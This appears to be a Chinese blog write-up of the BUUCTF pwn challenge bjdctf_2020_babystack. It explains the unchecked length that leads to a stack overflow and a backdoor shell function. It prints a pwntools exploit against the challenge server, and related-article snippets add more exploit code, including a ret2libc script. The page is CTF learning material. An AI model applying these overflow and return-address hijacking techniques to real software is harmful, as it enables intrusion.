bjdctf_2020_babystack

最新推荐文章于 2023-04-30 22:05:04 发布
最新推荐文章于 2023-04-30 22:05:04 发布
阅读量872 收藏 1
点赞数
分类专栏: buuctf ctf 笔记 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zip471642048/article/details/125403781
版权

bjdctf_2020_babystack

在这里插入图片描述
checksec 一下 64位程序 没开啥东西 ,ida看一下程序
在这里插入图片描述

main函数

咋一看read函数读入0个字符串,读了个寂寞,scanf也不能溢出,好像没有问题
在这里插入图片描述

但是scanf会读入一个用户输入的数赋值给nbytes ,然后read会读取nbytes大小的字符,也就是说我们可以任意溢出长度
在这里插入图片描述

backdoor函数

运行这个函数直接拿到shell
在这里插入图片描述
exp
ret 是为了平衡栈 其实往backdoor函数后递+1也行

from pwn import *

io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn",29159)
elf = ELF("./bjdctf_2020_babystack")
context(log_level="debug",arch="amd64")
backdoor = elf.symbols["backdoor"]
ret = 0x0000000000400561

print backdoor

io.sendlineafter(b"Please input the length of your name:","100")


payload = "a"*16 + "b"*8 + p64(ret) + p64(backdoor)
payload = flat(["a"*16,"b"*8,ret,backdoor])

io.sendlineafter("What's u name?",payload)
io.interactive()

在这里插入图片描述

日行一PWN bjdctf_2020_babystack 尝试动态调试?
m0_57221101的博客
06-02 540
BUUCTF在线评测 (buuoj.cn)还是buu的题,这次没什么好讲的,一道送分题,但是明白了一个道理,不要太相信ida 的伪代码,那玩意的作用是帮你快速看明白题是在干什么,而不是帮你弄清楚做出这道题的细节。尤其是数据长度部分那么直接来分析首先可以看到,只有NX,和部分RELRO保护ida静态分析也是非常干脆的给出了后门程序主函数更是简单,用scanf来输入一个数字,把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小(看伪代码此处说只有十二个,其实有16个,非常折磨
bjdctf_2020_babystack 1(栈溢出)
最新发布
Snk0xHeart的博客
04-14 252
开虚拟机checksec64位,没开栈保护扔进IDA(64位),找到main,F5反编译没啥东西,点进buf看看(同时注意第8行的nbytes,下面要用到)栈溢出吗?不管了,先数为敬,offset=16-4+8(dq=8)+8-4=24(注:buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出,原本的大小为0,没得读,只有我们为其赋值,我们写入的东西才能让他读(第8行和第18行代码))然后找找后门函数Shift+F12,看看有啥东西可用。
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1552
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
BUUCTF:bjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1705
BUUCTF:bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
buu bjdctf_2020_babystack2 整数溢出、栈溢出
qq_41849152的博客
09-14 256
整数溢出、栈溢出
BUUCTF pwn水题大赏(三)
o琦野o的博客
02-03 438
BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出,利用 write
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 995
[buuctf]bjdctf_2020_babystack
bjdctf_2020_babystack【BUUCTF】
qq_41696518的博客
08-26 1061
bjdctf_2020_babystack
bjdctf2020 babystack
pondzhang的专栏
05-08 399
from pwn import * p = process('./bjdctf_2020_babystack') p.recvuntil("length of your name:\n") p.sendline('1024') p.recvuntil("What's u name?\n") payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 3945
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 428
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 440
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 388
BUUCTF 做题练习
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 370
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 391
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
buuctf pwn rip
03-14
### BUUCTF Pwn 题目中 RIP 寄存器的利用方法 在处理像 `bjdctf_2020_babystack2` 这样的题目时,RIP(指令指针寄存器)控制是实现任意代码执行的关键[^1]。通常情况下,攻击者会通过覆盖返回地址来重定向程序流。 对于这类漏洞利用,常见的技术之一是 Return-to-libc (ret2libc),特别是在已知 libc 库函数地址的情况下更为有效。当存在堆栈溢出或其他可以写入内存的位置偏移时,可以通过精心构造输入数据链,使得程序跳转到特定库函数如 `system()` 并传递参数 `/bin/sh` 来获得 shell 访问权限[^2]。 然而,在实际环境中获取这些确切位置可能较为困难,因此还需要考虑其他因素: - **ASLR**(Address Space Layout Randomization) ASLR 是一种安全机制,它随机化进程空间中的各个部分基址,增加了预测所需 gadget 或函数地址难度。 - **PIE**(Position Independent Executable) PIE 编译选项使整个二进制文件成为位置无关可执行文件,进一步增强了防御强度。 为了绕过上述保护措施,常用的方法有: #### 泄露信息以计算偏移量 如果能够找到某种方式泄露某些固定位置的数据,则可以根据此推算出其他重要地址。例如,泄漏栈上某个局部变量的内容或者 GOT 表项等。 #### 利用已知 gadgets 构建 ROP 链 即使无法直接调用想要的功能,也可以尝试寻找一系列有用的 gadgets 组合成所需的逻辑操作序列。 下面是一个简单的 Python 脚本用于演示如何构建 payload 实现 ret2libc 攻击: ```python from pwn import * # 设置目标程序路径 binary_path = './vuln' # 启动本地或远程服务连接 if args.REMOTE: io = remote('challenge.example.com', 1337) else: elf = context.binary = binary_path io = process(binary_path) # 获取 libc 对象以便后续使用其符号表 libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') # 假设已经找到了一个可用于泄露的信息点... io.recvuntil(b'Leak me: ') leaked_address = u64(io.recv(6).ljust(8, b'\x00')) log.info(f"Leaked address: {hex(leaked_address)}") # ...并通过该信息计算得到 base 地址和其他有用地址 base_addr = leaked_address - offset_to_base system_addr = base_addr + libc.symbols['system'] bin_sh_str = base_addr + next(libc.search(b'/bin/sh\x00')) payload = flat({ offset: [ system_addr, 0xdeadbeef, # 不关心的返回地址 bin_sh_str ] }) io.sendlineafter(b'> ', payload) io.interactive() ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值